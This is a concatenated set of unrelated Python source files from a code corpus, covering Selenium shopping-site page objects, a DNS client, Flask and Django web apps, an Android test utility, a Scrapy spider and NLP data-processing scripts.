self.click(next_loc)
else:
self.click(self.first_page_loc)
break
def input_goods(self,text):
"""输入搜索商品名"""
self.send_keys(self.send_loc,text)
def click_search(self):
"""点击搜索按钮"""
self.click(self.search_loc)
if __name__ == '__main__':
from common.base import open_browser
driver = open_browser()
goods = Goodslist_Page(driver) # 实例化login page
goods.open_url(url) # 打开网址
goods.click_first() # 点击首页
categary_loc = ("css selector", "div.cat-box>div.cat1>a") # 商品类的定位器
goods_loc = ("css selector", "div.goods-title>a") # 商品列表的定位器
goods.click_texts(categary_loc, goods_loc) # 点击商品类
```
#### File: web_aaaaaaaa/page/place_order_07.py
```python
from common.base import Base
class SubmitOrder(Base):
# 申通
sto_loc = ('css selector','input[value="5"]')
# 邮局平邮
post_loc = ('css selector','input[value="6"]')
# 到付
to_pay_loc = ('css selector','input[value="7"]')
# 天工收银
tien_gong_loc = ('css selector','input[value="4"]')
# 支付宝
alipay_loc = ('css selector','input[value="alipay"]')
# 微信
weixin_loc = ('css selector','input[value="vxpay"]')
# 余额
balance_loc = ('css selector','input[value="1"][onclick="selectPayment(this)"]')
# 银行转账
bank_loc = ('css selector','input[value="2"]')
# 货到付款
reach_loc = ('css selector','input[value="3"]')
# 支付宝
payment_loc = ('name','payment')
# 提交订单
place_order_loc = ('css selector','input[type="image"]')
def sto(self):
# 点击选择申通
self.click(self.sto_loc)
def post(self):
# 点击选择平邮
self.click(self.post_loc)
def to_pay(self):
# 点击选择到付
self.click(self.to_pay_loc)
def tien_gong(self):
# 选择天工收银
self.click(self.tien_gong_loc)
def alipay(self):
# 选择支付宝
self.click(self.alipay_loc)
def weixin(self):
# 选择微信
self.click(self.weixin_loc)
def balance(self):
# 选择余额
self.click(self.balance_loc)
def bank(self):
# 选择银行转账
self.click(self.bank_loc)
def reach(self):
# 选择货到付款
self.click(self.reach_loc)
def payment(self):
# 选择支付宝支付
self.click(self.payment_loc)
def place_order(self):
# 提交订单
self.click(self.place_order_loc)
```
#### File: web_aaaaaaaa/page/purchase_page_05.py
```python
from common.base import Base
class Purchase(Base):
purchase_loc = ('class name','td1') # 创建定位器
def purchase(self):
self.click(self.purchase_loc) # 点击立即购买,加入购物车
```
#### File: web_aaaaaaaa/page/shopping_cart04.py
```python
from common.base import Base
from page.good_details3 import Buy_Good,good_url
class ShoppingCart(Base):
# 商品名称
good_name_loc =('class name','f6')
# 继续购物
keep_shopping_loc=('css selector','img[alt="continue"]')
# 购买数量
buy_num_loc=('class name','inputBg')
# 清空购物车
clear_car_loc=('css selector','input[type="button"]')
# 更新购物车
refresh_car_loc=('name','submit')
# 删除按钮
delete_loc =('link text','删除')
# 去结算
pay_loc=('css selector','img[alt="checkout"]')
# 购物金额小计
buy_price_loc=('css selector','td[bgcolor="#ffffff"]')
def click_keep_shopping(self):
self.click(self.keep_shopping_loc)
def click_send_num(self):
self.click(self.buy_num_loc)
# 输入数量
def send_buy_num(self,num):
self.click(self.buy_num_loc)
self.send_keys(self.buy_num_loc,num)
# 点击清空购物车
def click_clear_car(self):
self.click(self.clear_car_loc)
# 点击更新购物车
def update_car(self):
self.click(self.refresh_car_loc)
# 点击删除按钮
def delete_button(self):
self.click(self.delete_loc)
# 点击去结算
def pay(self):
self.click(self.pay_loc)
# 获取弹窗 确定删除
def get_alert_confirm(self):
alert =self.driver.switch_to.alert
alert.accept()
# 获取弹窗 取消
def get_alert(self):
alert =self.driver.switch_to.alert
alert.dismiss()
# 获取商品名称
def get_name(self,locator):
element = self.find_element(locator)
text = element.text
return text
# 获取商品数量
def get_num(self,locator):
element=self.find_element(locator)
num =element.get_attribute('value')
return num
# 获取金额小计具体内容
def get_price_content(self,locator):
element=self.find_element(locator)
content =element.text
return content
if __name__ == '__main__':
from common.base import open_browser
from time import sleep
driver = open_browser('chrome')
buy = Buy_Good(driver) # 实例化Buy_Good
buy.open_url(good_url)
buy.click_libuy()
shopping =ShoppingCart(driver) # 实例化ShoppingCart
good_loc=('class name','f6')
print(shopping.get_name(good_loc))
buy_num_loc = ('class name', 'inputBg')
shopping.send_buy_num(3)
shopping.update_car()
num =shopping.get_num(buy_num_loc)
print(num)
buy_price_loc = ('css selector', 'form[name="formCart"]>table:nth-of-type(2)>tbody>tr>td')
content =shopping.get_price_content(buy_price_loc)
print(content)
# shopping.click_keep_shopping() # 点击继续购物
# shopping.click_clear_car() # 清空购物车
# shopping.click_send_num()
# shopping.send_buy_num(3)
# 点击更新购物车
# shopping.update_car()
# 点击删除
# shopping.delete_button()
# sleep(2)
# shopping.get_alert_confirm()
``` |
{
"source": "1500cloud/lexicon",
"score": 2
} |
#### File: lexicon/lexicon/client.py
```python
from __future__ import absolute_import
import importlib
import tldextract
from lexicon import discovery
from lexicon.config import (
ConfigResolver, DictConfigSource,
legacy_config_resolver, non_interactive_config_resolver,
)
class ProviderNotAvailableError(Exception):
"""
Custom exception to raise when a provider is not available,
typically because some optional dependencies are missing
"""
class Client(object): # pylint: disable=useless-object-inheritance,too-few-public-methods
"""This is the Lexicon client, that will execute all the logic."""
def __init__(self, config=None):
if not config:
# If there is not config specified, we load a non-interactive configuration.
self.config = non_interactive_config_resolver()
elif not isinstance(config, ConfigResolver):
# If config is not a ConfigResolver, we are in a legacy situation.
# We protect this part of the Client API.
self.config = legacy_config_resolver(config)
else:
self.config = config
# Validate configuration
self._validate_config()
runtime_config = {}
# Process domain, strip subdomain
domain_parts = tldextract.extract(
self.config.resolve('lexicon:domain'))
runtime_config['domain'] = '{0}.{1}'.format(
domain_parts.domain, domain_parts.suffix)
if self.config.resolve('lexicon:delegated'):
# handle delegated domain
delegated = self.config.resolve('lexicon:delegated').rstrip('.')
if delegated != runtime_config.get('domain'):
# convert to relative name
if delegated.endswith(runtime_config.get('domain')):
delegated = delegated[:-len(runtime_config.get('domain'))]
delegated = delegated.rstrip('.')
# update domain
runtime_config['domain'] = '{0}.{1}'.format(
delegated, runtime_config.get('domain'))
self.action = self.config.resolve('lexicon:action')
self.provider_name = (self.config.resolve('lexicon:provider_name')
or self.config.resolve('lexicon:provider'))
self.config.add_config_source(DictConfigSource(runtime_config), 0)
provider_module = importlib.import_module(
'lexicon.providers.' + self.provider_name)
provider_class = getattr(provider_module, 'Provider')
self.provider = provider_class(self.config)
def execute(self):
"""Execute provided configuration in class constructor to the DNS records"""
self.provider.authenticate()
identifier = self.config.resolve('lexicon:identifier')
record_type = self.config.resolve('lexicon:type')
name = self.config.resolve('lexicon:name')
content = self.config.resolve('lexicon:content')
if self.action == 'create':
return self.provider.create_record(record_type, name, content)
if self.action == 'list':
return self.provider.list_records(record_type, name, content)
if self.action == 'update':
return self.provider.update_record(identifier, record_type, name, content)
if self.action == 'delete':
return self.provider.delete_record(identifier, record_type, name, content)
raise ValueError('Invalid action statement: {0}'.format(self.action))
def _validate_config(self):
provider_name = self.config.resolve('lexicon:provider_name')
if not self.config.resolve('lexicon:provider_name'):
raise AttributeError('provider_name')
try:
available = discovery.find_providers()[self.config.resolve('lexicon:provider_name')]
except KeyError:
raise ProviderNotAvailableError('This provider ({0}) is not supported by Lexicon.'
.format(provider_name))
else:
if not available:
raise ProviderNotAvailableError(
'This provider ({0}) has required dependencies that are missing. '
'Please install lexicon[{0}] first.'.format(provider_name))
if not self.config.resolve('lexicon:action'):
raise AttributeError('action')
if not self.config.resolve('lexicon:domain'):
raise AttributeError('domain')
if not self.config.resolve('lexicon:type'):
raise AttributeError('type')
``` |
{
"source": "15014370uhi/flask_api",
"score": 3
} |
#### File: 15014370uhi/flask_api/flask_server.py
```python
from flask import Flask, request
from flask_cors import CORS
import json
import os
from myLogisticRegression import getPredictions
app = Flask(__name__)
CORS(app)
@app.route("/")
def index():
return "Welcome to safe streets machine learning flask server"
@app.route("/predict", methods=["POST"])
def runPredictionModel():
data = request.get_json(silent=True)
month = data.get("month")
year = data.get("year")
lat = data.get("lat")
lon = data.get("lon")
sector = data.get("sector")
# call machine learning function with data
result = getPredictions(month, year, lat, lon, sector)
results_JSON = json.dumps(result)
# print("results_JSON: ", results_JSON)
return results_JSON
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=False, port=os.environ.get('PORT', 80))
#app.run(port=5000)
``` |
{
"source": "15045120/AndroidTest",
"score": 2
} |
#### File: AndroidTest/androidautotest/tool.py
```python
import os
import time
import traceback
import random
import sys
import json
import webbrowser
import subprocess
import urllib.request
import platform
import zipfile
import shutil
# dirname:get parent directory
# sys.argv[0] getFileName
CASE_PATH = os.path.abspath(os.path.dirname(sys.argv[0]))
PATHSEP = os.sep
LINESEQ = os.linesep
PLATFORM = platform.system()
USER_HOME = os.path.expanduser('~')
def line_join(*str):
str_all = ''
for i in range(len(str)):
str_all = str_all + str[i]
str_all = str_all + LINESEQ
return str_all
def confidence_precent(value):
return str(round(float(value)*100, 2))+'%'
def random_id():
time_log = time.strftime("[%Y-%m-%d %H:%M:%S] ", time.localtime())
time_str = time.strftime("%Y%m%d%H%M%S", time.localtime())
random_str = ''.join(random.sample(['0','1','2','3','4','5','6','7','8','9'], 6))
return time_log, time_str, random_str
def open_new_tab(path):
webbrowser.open_new_tab(path)
def set_adb_home():
ADB_HOME = Path.path_join(USER_HOME, '.androidautotest', 'platform-tools')
if PLATFORM == 'Windows':
Command.write('set path=%path%;{}'.format(ADB_HOME))
elif PLATFORM == 'Linux':
Command.write('export PATH={}:$PATH'.format(ADB_HOME))
class Path:
@staticmethod
def exists(path):
return os.path.exists(path)
@staticmethod
def isfile(path):
return os.path.isfile(path)
@staticmethod
def listdir(path):
return os.listdir(path)
@staticmethod
def isdir(path):
return os.path.isdir(path)
@staticmethod
def remove(path):
if os.path.exists(path):
os.remove(path)
@staticmethod
def makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
@staticmethod
def parent(path, isurl=False):
if isurl:
return path[0:path.rfind('/')]
else:
return path[0:path.rfind(PATHSEP)]
@staticmethod
def name(path, end=0, isurl=False):
tmp = ''
if isurl:
tmp = path[path.rfind('/')+1:len(path)]
else:
tmp = path[path.rfind(PATHSEP)+1:len(path)]
if end > 0:
return tmp[0:end]
elif end < 0:
return tmp[0:len(tmp)+end]
else:
return tmp
@staticmethod
def copy(source, dest):
shutil.copy(source, dest)
@staticmethod
def path_join(*path):
path_all = ''
for i in range(len(path)-1):
path_all = path_all + path[i] + PATHSEP
path_all = path_all + path[-1]
return path_all
class Command:
@staticmethod
def write(command):
return os.system(command)
@staticmethod
def read(command):
r = os.popen(command)
# Physical size: 1080x1920
lines = r.readlines()
lines_no_lineseq = []
for line in lines:
line_no_lineseq = line.strip(LINESEQ)
if line_no_lineseq != '':
lines_no_lineseq.append(line.strip(LINESEQ))
return lines_no_lineseq
@staticmethod
def exit(status=0):
return sys.exit(status)
@staticmethod
def argv(position):
return sys.argv[position]
@staticmethod
def traceback():
return traceback.format_exc()
class Json:
@staticmethod
def dumps(obj):
return json.dumps(obj)
@staticmethod
def loads(str):
return json.loads(str, encoding="utf-8", strict=False)
class Timer:
@staticmethod
def time():
return time.time()
@staticmethod
def sleep(sec):
return time.sleep(sec)
@staticmethod
def strftime(format, time_value):
return time.strftime(format, time.localtime(time_value))
@staticmethod
def calc(sec):
sec = int(sec)
second = 0
minute = 0
hour = 0
if sec > 3600:
hour = int(sec/3600)
minute = int((sec - hour*3600)/60)
second = sec - hour*3600 - minute*60
elif sec > 60:
hour = 0
minute = int(sec/60)
second = sec - hour*3600 - minute*60
else:
hour = 0
minute = 0
second = sec
return hour, minute, second
class Downloader:
__start_time = -1
def download(self, http_url, dependency_dir):
print(' Downloading %s ... ' % http_url)
local_dir = Path.path_join(dependency_dir, Path.name(http_url, isurl=True))
self.__start_time = time.time()
urllib.request.urlretrieve(http_url, local_dir, self.__report_hook)
print()
# unzip file if file ends with 'zip'
if Path.name(http_url, isurl=True).endswith('zip'):
Ziper.unzip(local_dir, Path.parent(local_dir))
def __report_hook(self, block_number, read_size, total_size):
precent = int((100.0*block_number*read_size)/total_size)
percent_str = '{}%'.format(precent)
size, unit = self.__calc_byte(total_size)
total_str = str(size) + unit
size, unit = self.__calc_byte((block_number*read_size)/(time.time()-self.__start_time))
time_left_str = '0:00:00'
speed = (block_number*read_size)/(time.time()-self.__start_time)
speed_str = '0kB/s'
if speed != 0:
speed_str = str(size) + unit +'/s'
hour, minute, second = Timer.calc((total_size-block_number*read_size)/speed)
time_left_str = str(hour).zfill(1) +':'+ str(minute).zfill(2) +':'+ str(second).zfill(2)
if block_number*read_size < total_size:
current_size_str = str(block_number*read_size) + '/' + str(total_size)
else:
current_size_str = str(total_size) + '/' + str(total_size)
# \r to flush
sys.stdout.write('\r %s |%s%s| %s %s [%s %s]' % (percent_str, '█' * int(precent/5), ' ' * int((100-precent)/5), total_str, current_size_str, time_left_str, speed_str))
sys.stdout.flush()
time.sleep(0.005)
def __calc_byte(self, byte_size):
size = 0
unit = 'B'
if byte_size < 102.4:#20B
size = round(byte_size)
unit = 'B'
elif (byte_size/1024) < 1024:#
size = round(byte_size/1024, 1)
if size > 1:
size = round(size)
unit = 'kB'
else:
size = round(((byte_size/1024)/1024), 1)
unit = 'MB'
return size, unit
class Ziper:
@staticmethod
def unzip(zip_path, output_path):
print('Unziping %s ... ' % zip_path)
zip_file = zipfile.ZipFile(zip_path)
for names in zip_file.namelist():
print('Extracting %s ...' % names)
if not Path.exists(Path.path_join(output_path, names)):
zip_file.extract(names, output_path)
zip_file.close()
Path.remove(zip_path)
``` |
{
"source": "150619/HMTopNews",
"score": 2
} |
#### File: HMTopNews/app/__init__.py
```python
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# 创建mysql数据库对象
db = SQLAlchemy()
# 创建redis数据库对象
redis_client = None
# 注册扩展组件
def register_extensions(app: Flask):
# 关联flask应用
db.init_app(app)
# 创建redis数据库对象,decode_response=True
global redis_client
from redis import StrictRedis
redis_client = StrictRedis(host=app.config['REDIS_HOST'], port=app.config['REDIS_PORT'], decode_responses=True)
# 注册路由转换器
from common.utils.converters import register_converters
register_converters(app)
# 迁移
from flask_migrate import Migrate
Migrate(app, db)
from common.models import user, article
# 添加请求钩子
from common.utils.middlewares import get_user_info
app.before_request(get_user_info)
# 注册蓝图组件
def register_bp(app: Flask):
from app.resource.user import user_bp
app.register_blueprint(user_bp)
from app.resource.channel import channel_bp
app.register_blueprint(channel_bp)
from app.resource.article import article_bp
app.register_blueprint(article_bp)
# 内部调用创建app工厂的方法
def create_flask_app(config_name):
# 创建flask_app对象
flask_app = Flask(__name__)
# 读取配置类中的配置信息
from app.settings.config import config_dict
config_class = config_dict[config_name]
flask_app.config.from_object(config_class)
# 读取环境变量中的配置信息
from common.utils.constants import EXTRA_ENV_CONFIG
flask_app.config.from_envvar(EXTRA_ENV_CONFIG, silent=True)
return flask_app
# 提供一个给外界调用的创建app的方法
def create_app(config_name):
# 创建app对象
app = create_flask_app(config_name)
# 注册扩展组件
register_extensions(app)
# 注册蓝图组件
register_bp(app)
return app
```
#### File: resource/user/user_followings.py
```python
from datetime import datetime
from flask import request, g
from flask_restful import Resource
from flask_restful.reqparse import RequestParser
from app import db
from common.models.user import User, Relation
from common.utils.decorators import login_required
class UserFollow(Resource):
method_decorators = {'post': [login_required]}
def post(self):
parser = RequestParser()
parser.add_argument('target', location='json', required=True, type=int)
args = parser.parse_args()
target = args.target
user_id = g.user_id
relation_ = Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target,
Relation.relation == Relation.RELATION.FOLLOW).all()
relation__ = Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target,
Relation.relation == Relation.RELATION.BLACKLIST).all()
relation___ = Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target,
Relation.relation == Relation.RELATION.DELETE).all()
relation____ = Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target).all()
# 没有关注信息则更新用户粉丝数关注数
if not relation_:
User.query. \
filter(User.id == target). \
update({'fans_count': User.fans_count + 1})
User.query. \
filter(User.id == user_id). \
update({'following_count': User.following_count + 1})
# 没有任何关系信息则添加关系信息
if not relation____:
relation = Relation(user_id=g.user_id, author_id=target, update_time=datetime.now(),
relation=Relation.RELATION.FOLLOW)
db.session.add(relation)
else:
return {'message': '已关注'}
# 有黑名单关系或删除关系
if relation__ or relation___:
# 更新关注信息
Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target). \
update({'relation': Relation.RELATION.FOLLOW})
db.session.commit()
return {'target': target}
```
#### File: resource/user/user_info.py
```python
from flask_restful import Resource
from common.utils.decorators import login_required
class UserInfoResource(Resource):
method_decorators = {'get': [login_required]}
def get(self):
# 找到已登录用户的id
from flask import g
user_id = g.user_id
from common.models.user import User
from sqlalchemy.orm import load_only
# 通过当前登录用户id从数据库中查询
user_info = User.query. \
options(load_only(User.id, User.name, User.profile_photo, User.introduction, User.article_count,
User.following_count, User.fans_count)). \
filter(user_id == User.id).first()
return user_info.to_dict()
```
#### File: common/models/article.py
```python
from datetime import datetime
from app import db
class Channel(db.Model):
"""
新闻频道
"""
__tablename__ = 'news_channel'
id = db.Column(db.Integer, primary_key=True, doc='频道ID')
name = db.Column(db.String(30), doc='频道名称')
is_default = db.Column(db.Boolean, default=False, doc='是否默认')
def to_dict(self):
return {
'id': self.id,
'name': self.name
}
class UserChannel(db.Model):
"""
用户关注频道表
"""
__tablename__ = 'news_user_channel'
id = db.Column(db.Integer, primary_key=True, doc='主键ID')
user_id = db.Column(db.Integer, doc='用户ID')
channel_id = db.Column(db.Integer, doc='频道ID')
sequence = db.Column(db.Integer, default=0, doc='序号')
is_deleted = db.Column(db.Boolean, default=False, doc='是否删除')
class Article(db.Model):
"""
文章基本信息表
"""
__tablename__ = 'news_article_basic'
class STATUS:
DRAFT = 0 # 草稿
UNREVIEWED = 1 # 待审核
APPROVED = 2 # 审核通过
FAILED = 3 # 审核失败
DELETED = 4 # 已删除
BANNED = 5 # 封禁
id = db.Column(db.Integer, primary_key=True, doc='文章ID')
user_id = db.Column(db.Integer, doc='用户ID')
channel_id = db.Column(db.Integer, doc='频道ID')
title = db.Column(db.String(130), doc='标题')
cover = db.Column(db.JSON, doc='封面')
ctime = db.Column(db.DateTime, default=datetime.now, doc='创建时间')
status = db.Column(db.Integer, default=0, doc='帖文状态')
comment_count = db.Column(db.Integer, default=0, doc='评论数')
class ArticleContent(db.Model):
"""
文章内容表
"""
__tablename__ = 'news_article_content'
article_id = db.Column(db.Integer, primary_key=True, doc='文章ID')
content = db.Column(db.Text, doc='帖文内容')
```
#### File: common/utils/parser.py
```python
import re
import base64
import imghdr
from datetime import datetime
def email(email_str):
"""
检验邮箱格式
:param email_str: str 被检验字符串
:return: email_str
"""
if re.match(r'^([A-Za-z0-9_\-\.\u4e00-\u9fa5])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,8})$', email_str):
return email_str
else:
raise ValueError('{} is not a valid email'.format(email_str))
def mobile(mobile_str):
"""
检验手机号格式
:param mobile_str: str 被检验字符串
:return: mobile_str
"""
if re.match(r'^1[3-9]\d{9}$', mobile_str):
return mobile_str
else:
raise ValueError('{} is not a valid mobile'.format(mobile_str))
def id_number(value):
"""检查是否为身份证号"""
id_number_pattern = r'(^[1-9]\d{5}(18|19|([23]\d))\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\d{3}[0-9Xx]$)|(^[1-9]\d{5}\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\d{2}$)'
if re.match(id_number_pattern, value):
return value.upper()
else:
raise ValueError('Invalid id number.')
``` |
{
"source": "150619/meiduo_mall_project",
"score": 2
} |
#### File: apps/users/utils.py
```python
import re
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import JsonResponse
from apps.users.models import User
class AuthMobile(ModelBackend):
def authenticate(self, request, username=None, password=None, **kwargs):
try:
if re.match(r'^1[3-9]\d{9}$', username):
user = User.objects.get(mobile=username)
else:
user = User.objects.get(username=username)
except User.DoesNotExist:
return
if user and user.check_password(password):
return user
else:
return
class LoginRequiredJsonMixin(LoginRequiredMixin):
def handle_no_permission(self):
return JsonResponse({'code': 400, 'errmsg': '用户未登录'})
```
#### File: apps/users/views.py
```python
import json
import re
from django.contrib.auth import login, authenticate, logout
from django.http import JsonResponse
from django.views import View
from django_redis import get_redis_connection
from apps.users.models import User
from apps.users.utils import LoginRequiredJsonMixin
class RegisterName(View):
# 解析路径参数
def get(self, request, username):
# 从数据库中查询数据
count = User.objects.filter(username=username).count()
return JsonResponse({'code': '0', 'errmsg': 'ok', 'count': count})
class RegisterMobile(View):
def get(self, request, mobile):
# 从数据库中查询数据
count = User.objects.filter(mobile=mobile).count()
return JsonResponse({'code': '0', 'errmsg': 'ok', 'count': count})
class Register(View):
def post(self, request):
# 解析请求体参数
# json_bytes = request.body
# json_str = json_bytes.decode()
json_dict = json.loads(request.body)
# 获取username
username = json_dict.get('username')
# 获取password和password2
password = json_dict.get('password')
password2 = <PASSWORD>_<PASSWORD>('<PASSWORD>')
# 获取mobile
mobile = json_dict.get('mobile')
# 获取sms_code
sms_code = json_dict.get('sms_code')
# 获取allow
allow = json_dict.get('allow')
# 判断必传参数是否全部存在,allow不用校验
if not all([username, password, password2, mobile, sms_code]):
return JsonResponse({'code': '400', 'errmsg': '缺少必传参数'})
# 判断username的格式
if not re.match(r'[a-zA-Z0-9_-]{5,20}', username):
return JsonResponse({'code': '400', 'errmsg': '用户名格式错误'})
# 判断数据库中是否已经存在一个username
count = User.objects.filter(username=username).count()
# 存在返回错误码
if count > 0:
return JsonResponse({'code': '400', 'errmsg': '用户名已存在'})
# 判断密码格式
if not re.match(r'^[a-zA-Z0-9]{8,20}$', password):
return JsonResponse({'code': '400', 'errmsg': '密码格式错误'})
# 判断password和password2是否相等,不相等返回错误码
if password != password2:
return JsonResponse({'code': '400', 'errmsg': '两次输入的密码不一致'})
# 判断手机号格式
if not re.match(r'1[3-9]\d{9}', mobile):
return JsonResponse({'code': '400', 'errmsg': '手机号格式不正确'})
# 判断手机号是否存在
count = User.objects.filter(mobile=mobile).count()
if count > 0:
return JsonResponse({'code': '400', 'errmsg': '手机号已存在'})
# 与redis中储存的验证码做对比
redis_connect = get_redis_connection('verify_code')
real_sms_code_b = redis_connect.get(f'{mobile}')
# 判断redis数据库短信验证码是否过期
if real_sms_code_b:
real_sms_code = real_sms_code_b.decode()
# 如果不相等返回错误码
if real_sms_code != sms_code:
return JsonResponse({'code': '400', 'errmsg': '短信验证码错误'})
else:
return JsonResponse({'code': '400', 'errmsg': '短信验证码不存在或已过期,请重新获取'})
# 不为True返回错误码
if not allow:
return JsonResponse({'code': '400', 'errmsg': '请同意用户协议'})
# 将获取到的数据保存到数据库,直接使用create会导致authenticate无法认证,且密码是明文储存到数据库
# user = User.objects.create(username=username, password=password, mobile=mobile)
user = User.objects.create_user(username=username, password=password, mobile=mobile)
# 登录状态保持
login(request, user)
response = JsonResponse({'code': '0', 'errmsg': 'ok'})
response.set_cookie('username', user.username, max_age=3600 * 24 * 14)
return response
class Login(View):
def post(self, request):
json_dict = json.loads(request.body)
# 获取参数
username = json_dict.get('username')
password = json_dict.get('password')
remembered = json_dict.get('remembered')
# 判断参数是否全部存在remembered不用校验
if not all([username, password]):
return JsonResponse({'code': 400, 'errmsg': '缺少必传参数'})
# 从数据库获取数据(使用filter返回的是QuerySet不方便做状态保持)
# user = User.objects.filter(username=username, password=password)
# 判断用户输入的账号是否是手机号
# if re.match(r'^1[3-9]\d{9}$', username):
# 将USERNAME_FIELD指定为mobile字段
# User.USERNAME_FIELD = 'mobile'
# else:
# 将USERNAME_FIELD指定为username字段
# User.USERNAME_FIELD = 'username'
# 判断用户输入的账号是否是手机号
# 验证用户名和密码
user = authenticate(request=None, username=username, password=password)
if not user:
return JsonResponse({'code': 400, 'errmsg': '用户名或密码错误'})
# 登录状态保持
login(request, user)
if remembered:
request.session.set_expiry(None)
else:
request.session.set_expiry(0)
# 后端设置cookie,前端获取cookie,使页面可以展示用户名
response = JsonResponse({'code': 0, 'errmsg': 'ok'})
response.set_cookie('username', user.username, max_age=3600 * 24 * 14)
return response
class Logout(View):
def delete(self, request):
logout(request)
response = JsonResponse({'code': 0, 'errmsg': 'ok'})
response.delete_cookie('username')
return response
class UserInfo(LoginRequiredJsonMixin, View):
def get(self, request):
# user是请求中认证出的用户对象
user = request.user
return JsonResponse({
'code': 0,
'errmsg': 'ok',
"info_data": {
"username": user.username,
"mobile": user.mobile,
"email": user.email,
# "email_active": user.email_active,
}
})
``` |
{
"source": "150619/spider_project",
"score": 3
} |
#### File: spider_boy/spiders/itcast.py
```python
import scrapy
# time = //div[@class="masonry_date_block"]
class ItcastSpider(scrapy.Spider):
name = 'itcast'
allowed_domains = ['netflav.com']
start_urls = ['http://netflav.com/all']
def parse(self, response):
# name = response.xpath('//div')
name = response.xpath('//div[@class="masonry_title_block"]')
print('#' * 30)
# print(type(response))
# print(type(name))
# print(response.text)
print(name)
print('#' * 30)
``` |
{
"source": "1506607292/loremsurvey",
"score": 4
} |
#### File: loremsurvey/tests/tests.py
```python
class TClassStatic(object):
obj_num = 0
def __init__(self, data):
self.data = data
TClassStatic.obj_num += 1
def printself(self):
print("self.data: ", self.data)
@staticmethod
def smethod():
print("the number of obj is : ", TClassStatic.obj_num)
@classmethod
def cmethod(cls):
print("cmethod : ", cls.obj_num)
print(';first')
cls.smethod()
print('last')
def main():
objA = TClassStatic(10)
objB = TClassStatic(12)
objA.printself()
objB.printself()
objA.smethod()
objB.cmethod()
print("------------------------------")
TClassStatic.smethod()
TClassStatic.cmethod()
if __name__ == "__main__":
main()
``` |
{
"source": "1509098778/wukong-robot",
"score": 3
} |
#### File: robot/sdk/AbstractPlugin.py
```python
from abc import ABCMeta, abstractmethod
class AbstractPlugin(metaclass=ABCMeta):
""" 技能插件基类 """
SLUG = 'AbstractPlugin'
IS_IMMERSIVE = False
def __init__(self, con):
if self.IS_IMMERSIVE is not None:
self.isImmersive = self.IS_IMMERSIVE
else:
self.isImmersive = False
self.priority = 0
self.con = con
self.nlu = self.con.nlu
def play(self, src, delete=False, onCompleted=None, volume=1):
self.con.play(src, delete, onCompleted, volume)
def say(self, text, cache=False, onCompleted=None):
self.con.say(text, cache=cache, plugin=self.SLUG, onCompleted=onCompleted)
def activeListen(self):
return self.con.activeListen()
def clearImmersive(self):
self.con.setImmersiveMode(None)
@abstractmethod
def isValid(self, query, parsed):
"""
是否适合由该插件处理
参数:
query -- 用户的指令字符串
parsed -- 用户指令经过 NLU 解析后的结果
返回:
True: 适合由该插件处理
False: 不适合由该插件处理
"""
return False
@abstractmethod
def handle(self, query, parsed):
"""
处理逻辑
参数:
query -- 用户的指令字符串
parsed -- 用户指令经过 NLU 解析后的结果
"""
pass
def isValidImmersive(self, query, parsed):
"""
是否适合在沉浸模式下处理,
仅适用于有沉浸模式的插件(如音乐等)
当用户唤醒时,可以响应更多指令集。
例如:“"上一首"、"下一首" 等
"""
return False
def restore(self):
"""
恢复当前插件,
仅适用于有沉浸模式的插件(如音乐等)
当用户误唤醒或者唤醒进行闲聊后,
可以自动恢复当前插件的处理逻辑
"""
return
``` |
{
"source": "15091444119/MASS",
"score": 3
} |
#### File: MASS/MASS-unsupNMT/filter_noisy_data.py
```python
import re
import argparse
from langdetect import detect
from polyglot.detect import Detector
def get_parser():
parser = argparse.ArgumentParser(description="Remove noisy data")
parser.add_argument("--input", type=str,
help="The path of input file")
parser.add_argument("--lang", type=str,
help="The language of input file")
parser.add_argument("--output", type=str, default=None,
help="The path of output file")
return parser
def detect_exist_url(text):
urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', text)
url1 = re.findall('http[s]?//(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', text)
return len(urls) > 0 or len(url1) > 0
def detect_lang(text, lang):
try:
for i, l in enumerate(Detector(text, quiet=True).languages):
if l.code == lang and i == 0:
return True
if detect(text) == lang:
return True
return False
except:
return False
def main():
parser = get_parser()
args = parser.parse_args()
count = 0
allcount = 0
f = None
if args.output is not None:
f = open(args.output, 'w')
with open(args.input, encoding='utf-8') as input_file:
for line in input_file:
allcount += 1
line = line.strip()
if detect_exist_url(line) is False:
if detect_lang(line, args.lang) is True:
count += 1
if args.output is not None:
f.write(line + '\n')
#print(line)
if allcount % 1000000 == 0:
print("{} sentences processed".format(allcount), count)
print(count, allcount)
if __name__ == "__main__":
main()
``` |
{
"source": "15091444119/NJUNMT-pytorch",
"score": 2
} |
#### File: src/metric/bleu_scorer.py
```python
import os
import subprocess
from subprocess import DEVNULL
__all__ = [
'SacreBLEUScorer'
]
DETRUECASE_PL = os.path.join(os.path.dirname(__file__), "scripts/recaser/detruecase.perl")
DETOKENIZE_PL = os.path.join(os.path.dirname(__file__), "scripts/tokenizer/detokenizer.perl")
ZH_TOKENIZER_PY = os.path.join(os.path.dirname(__file__), "scripts/tokenizer/tokenizeChinese.py")
class SacreBLEUScorer(object):
"""Evaluate translation using external scripts.
Scripts are mainly from moses for post-processing and BLEU computation
"""
def __init__(self, reference_path, lang_pair, sacrebleu_args=None, postprocess=False, num_refs=1, test_set=None):
"""Initialize Scorer
Args:
reference_path: Path to reference files. If there are multiple reference files, such as
'ref.0', 'ref.1', ..., 'ref.n', just pass a 'ref.'
lang: Language of reference such as en, de, zh and et al.
bleu_script: Script used to calculate BLEU. Only ```multi-bleu.perl``` and ```multi-bleu-detok.perl```
are supported here.
digits_only: Return bleu score only. Default is true.
lc: Whether to use the lowercase of reference. It is equivalent to '-lc' option of the multi-bleu script.
